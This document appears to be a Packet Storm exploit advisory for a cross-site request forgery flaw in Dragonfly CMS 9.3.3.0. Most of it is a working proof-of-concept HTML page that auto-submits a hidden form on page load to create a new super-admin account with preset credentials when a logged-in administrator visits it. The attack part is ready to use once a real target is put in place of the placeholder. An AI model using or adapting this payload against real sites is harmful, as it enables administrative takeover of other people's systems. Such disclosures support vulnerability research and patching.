Dragonfly CMS version 9.3.3.0 suffers from a cross site request forgery vulnerability.
a7b0b879b5815f10854bd9ce1f7b71d046ff7a43fabad43516c1404897e6c271=================================================================================================
Vulnerable Software: Dragonfly CMS v9.3.3.0
Downloaded and tested from: http://dragonflycms.org/Downloads/get=28/
Fileinfo:dragonflycms.org Dragonfly9.3.3.0.zip 2.25 MB 70aea682301253637844d7caa10c3ed0
=================================================================================================
Vuln Desc:
Dragonfly CMS v9.3.3.0 suffers from CROSS SITE REQUEST FORGERY vulnerability.
Will Pwn: If currently logged administrator visits malicious LINK which contains POC code(see below)
New Super Admin will be created on remote site with this credentials:
Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1
@Print Screen on Success Pwn: http://s019.radikal.ru/i635/1203/f1/03e535781d5f.png
=================================================================================================
/*
Tested on: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
Successfully exploitates.
*/
===================Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit=====================
<html>
<head>
<title>Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" autocomplete="off" action="http://CHANGE_TO_RTARGET/admin.php?op=admins&mode=add" enctype="multipart/form-data" accept-charset="utf-8">
<!-- User name -->
<input type="hidden" name="add_aid" id="add_aid" size="31" maxlength="30" value="MySecRet1"/>
<!-- Email Address -->
<input type="hidden" name="add_email" id="add_email" size="31" maxlength="60" value="MySecRet1@localhost.tld" />
<!-- checked (for create super admin)-->
<input type="hidden" name="radminsuper" id="radminsuper" value="1" checked="checked" />
<!-- Password -->
<input type="hidden" name="add_pwd" id="add_pwd" size="20" maxlength="40" value="MySecRet1" />
</form>
</body>
<!--
On successfully Pwn will be created:
Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1
CTRL+F http://CHANGE_TO_RTARGET change to remote target.
-->
</html>
===================================EOF==========================================================
/AkaStep ^_^
GreetZ to all: packetstormsecurity.* ,securityfocus.com,security.nnov.ru
+--------------+
| Live |
+--------------+
| 1331522784 |
+--------------+
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed